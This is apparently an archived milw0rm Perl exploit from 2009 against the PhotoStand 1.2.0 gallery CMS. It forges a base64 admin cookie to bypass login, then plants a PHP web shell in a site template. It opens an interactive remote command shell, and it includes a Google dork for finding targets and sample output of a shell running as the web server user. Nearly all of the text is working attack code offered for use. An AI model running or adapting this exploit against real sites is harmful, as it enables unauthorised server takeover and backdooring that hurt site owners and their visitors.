PhotoStand 1.2.0 Remote Command Execution Exploit #!/usr/bin/perl

# App  : PhotoStand 1.2.0
# Site : http://www.photostand.org
# Remote Command Execution Exploit
# Credits to : Giovanni Buzzin, `Osirys`
# osirys[at]autistici[dot]org
# Greets: drosophila, emgent, Fireshot

# PhotoStand is a used Image Gallery CMS.
# PhotoStand is vulnerable to SQL Injection, (AUTH BYPASS), creating a cookie with the nick of the admin encoded in BASE64,
# a remote user is able to become Admin. The exploit just bypass the login, and edits the template putting in it code prone
# to RCE. It doesn't change anything, in fact it gets the previous template, and just adds the hell code.
# ENJOY

# Google Dork: powered by PhotoStand  Design by Vlad

# -------------------------------------------------------------------------------------
# Exploit tested in Local :
# -------------------------------------------------------------------------------------
# osirys[~]>$ perl r0x.txt http://localhost/photostand_1.2.0/photostand_1.2.0/ admin
#
#   ----------------------------
#      Photobase RCE Exploit
#         Coded by Osirys
#   ----------------------------
#
# [*] Bypassing Admin Login with a evil cookie !
# [+] SESSION ID grabbed: sbt9f85ps9n29an2d31911n806
# [*] Admin Login Bypassed !
# [*] Template source Found, editing it ..
# [*] Template edited, backdoored !!
# [*] Shell succesfully spawned !!
# [:D Hi myLord, execute your commands !!
#
# shell[localhost]$> id
# uid=80(apache) gid=80(apache) groups=80(apache)
# shell[localhost]$> pwd
# /home/osirys/web/photostand_1.2.0/photostand_1.2.0/templates/Simplified
# shell[localhost]$> exit
# [-] Quitting ..
#
# osirys[~]>$
# -------------------------------------------------------------------------------------

use HTTP::Request;
use LWP::UserAgent;
use IO::Socket;
use URI::Escape;
use MIME::Base64;

my $host  =  $ARGV[0];
my $user  =  $ARGV[1];
my $rand  =  int(rand 150);
my $rand1 =  `1337`.$rand;
my $rce   =  `<?php if(isset(§§§_GET[cmd])) {echo \`<br>$rand1<br>\`;system(§§§_GET[cmd]);echo \`$rand1<br>\`;}?>`;
my $rce_p =  `/templates/Simplified/index.php?cmd=`;

chomp($user);
$cookie = encode_base64($user);
$cookie =~ s/\%([A-Fa-f0-9]{2})/pack('C', hex($1))/seg;
$cookie =~ s/([^A-Za-z0-9])/sprintf(`%%%02X`, ord($1))/seg;

help(`-1`) unless (($host)&amp;&amp;($user));
cheek($host) == 1 || help(`-2`);
&amp;banner;

$datas = get_data($host);
$datas =~ /(.*) (.*)/;
($h0st,$path) = ($1,$2);

print `[*] Bypassing Admin Login with a evil cookie !\n`;
socket_req(`GET`,$path.`/admin/index.php`,$cookie,``,1);
$phpsessid || die `\n[-] Can't login with evil Cookie !\n\n`;
$cookie .= `; PHPSESSID=`.$phpsessid;
socket_req(`GET`,$path.`/admin/newart.php`,$cookie,``,2,`New article<\/title>`);
$gotcha == 1 || die `\n[-] Can't login with evil Cookie !\n\n`;
print `[*] Admin Login Bypassed !\n`;
socket_req(`GET`,$path.`/admin/options.php?page=editor&amp;edit=Simplified`,$cookie,``,3);

my $re = join '', @tmp_out;
my $content = tag($re);
if ($content =~ /class=`textbox`>(.+)<\/textarea>/) {
    $template = $1;
    print `[*] Template source Found, editing it ..\n`;
}
else {
    print `[-] Template source not Found, exiting ..\n`;
    exit(0);
}

$template =~ s/(.+)/$rce$1/;
$template =~ s/\*/\n/g;
$template =~ s/\$/ /g;
$template =~ s/§§§/\$/g;
$template =~ s/\( _GET/(\$_GET/g;
my $code = uri_escape($template);
$code =~ s/\(/%28/g;
$code =~ s/\)/%29/g;
$code =~ s/%20/+/g;
$code =~ s/'/%27/g;
$code =~ s/!/%21/g;

my $post = `action=save&amp;tpid=4&amp;tp=index.php&amp;template=Simplified&amp;type=1&amp;page=editor&amp;editpage=`.$code;
socket_req(`POST`,$path.`/admin/options.php`,$cookie,$post,0,``,1);

my $exec_url = ($host.$rce_p.`id`);
my $re = get_req($exec_url);
if ($re =~ /uid=/) {
    print `[*] Template edited, backdoored !!\n[*] Shell succesfully spawned !!\n[:D Hi myLord, execute your commands !!\n\n`;
    &amp;exec_cmd;
}
else {
    print `[-] Something wrong, sploit failed !\n\n`;
    exit(0);
}

sub socket_req() {
    my($request,$path,$cookie,$content,$opt,$regexp,$sock_opt) = @_;
    my $stop;
    my $length = length($content);
    my $socket   =  new IO::Socket::INET(
                                            PeerAddr => $h0st,
                                            PeerPort => '80',
                                            Proto    => 'tcp',
                                         ) or die $!;

    if ($sock_opt == 1) {
        $opt_1 = `Referer: `.$host.`/admin/options.php?page=editor&amp;edit=Simplified\r\n`;
        $opt_2 = `Content-Type: application/x-www-form-urlencoded\r\n`;
    }
    else {
        $opt_1 = ``;
        $opt_2 = ``;
    }
    my $data = $request.` `.$path.` HTTP/1.1\r\n`.
               `Host: `.$h0st.`\r\n`.
               `Keep-Alive: 300\r\n`.
               `Connection: keep-alive\r\n`.
               $opt_1.
               `Cookie: PS-SAVE=`.$cookie.`\r\n`.
               $opt_2.
               `Content-Length: `.$length.`\r\n\r\n`.
               $content.`\r\n`;

    $socket->send($data);
    while ((my $e = <$socket>)&amp;&amp;($stop != 1)) {
        if ($opt == 0) {
            $stop = 1;
        }
        elsif ($opt == 1) {
            if ($e =~ /Set-Cookie: PHPSESSID=([0-9a-z]{1,50});/) {
                $phpsessid = $1;
                print `[+] SESSION ID grabbed: $phpsessid\n`;
                $stop = 1;
            }
        }
        elsif ($opt == 2) {
            if ($e =~ /$regexp/) {
                ($stop,$gotcha) = (1,1);
            }
        }
        elsif ($opt == 3) {
            push(@tmp_out,$e);
        }

    }
}

sub exec_cmd {
    $h0st !~ /www\./ || $h0st =~ s/www\.//;
    print `shell[$h0st]\$> `;
    $cmd = <STDIN>;
    $cmd !~ /exit/ || die `[-] Quitting ..\n\n`;
    $exec_url = $host.$rce_p.$cmd;
    my $re = get_req($exec_url);
    my $content = tag($re);
    if ($content =~ m/<br>$rand1<br>(.+)$rand1<br>/g) {
        my $out = $1;
        $out =~ s/\$/ /g;
        $out =~ s/\*/\n/g;
        chomp($out);
        print `$out\n`;
        &amp;exec_cmd;
    }
    else {
        $c++;
        $cmd =~ s/\n//;
        print `bash: `.$cmd.`: command not found\n`;
        $c < 3 || die `[-] Command are not executed.\n[-] Something wrong. Exploit Failed !\n\n`;
        &amp;exec_cmd;
    }

}

sub get_req() {
    $link   = $_[0];
    my $req = HTTP::Request->new(GET => $link);
    my $ua  = LWP::UserAgent->new();
    $ua->timeout(4);
    my $response = $ua->request($req);
    return $response->content;
}

sub cheek() {
    my $host = $_[0];
    if ($host =~ /http:\/\/(.+)/) {
        return 1;
    }
    else {
        return 0;
    }
}

sub get_data() {
    my $host = $_[0];
    $host =~ /http:\/\/(.*)/;
    $s_host = $1;
    $s_host =~ /([a-z.]{1,30})\/(.*)/;
    ($h0st,$path) = ($1,$2);
    $h0st !~ /www/ || $h0st =~ s/www\.//;
    $path =~ s/(.*)/\/$1/;
    $full_det = $h0st.` `.$path;
    return $full_det;
}

sub tag() {
    my $string = $_[0];
    $string =~ s/ /\$/g;
    $string =~ s/\s/\*/g;
    return($string);
}

sub banner {
    print `\n`.
          `  ---------------------------- \n`.
          `     PhotoStand RCE Exploit    \n`.
          `         Coded by Osirys       \n`.
          `  ---------------------------- \n\n`;
}

sub help() {
    my $error = $_[0];
    if ($error == -1) {
        &amp;banner;
        print `\n[-] Bad Input!\n`;
    }
    elsif ($error == -2) {
        &amp;banner;
        print `\n[-] Bad hostname address !\n`;
    }
    print `[*] Usage : perl $0 http://hostname/cms_path admin_username\n`;
    print `    admin_username is the nick of the admin.\n\n`;
    exit(0);
}

# milw0rm.com [2009-03-26]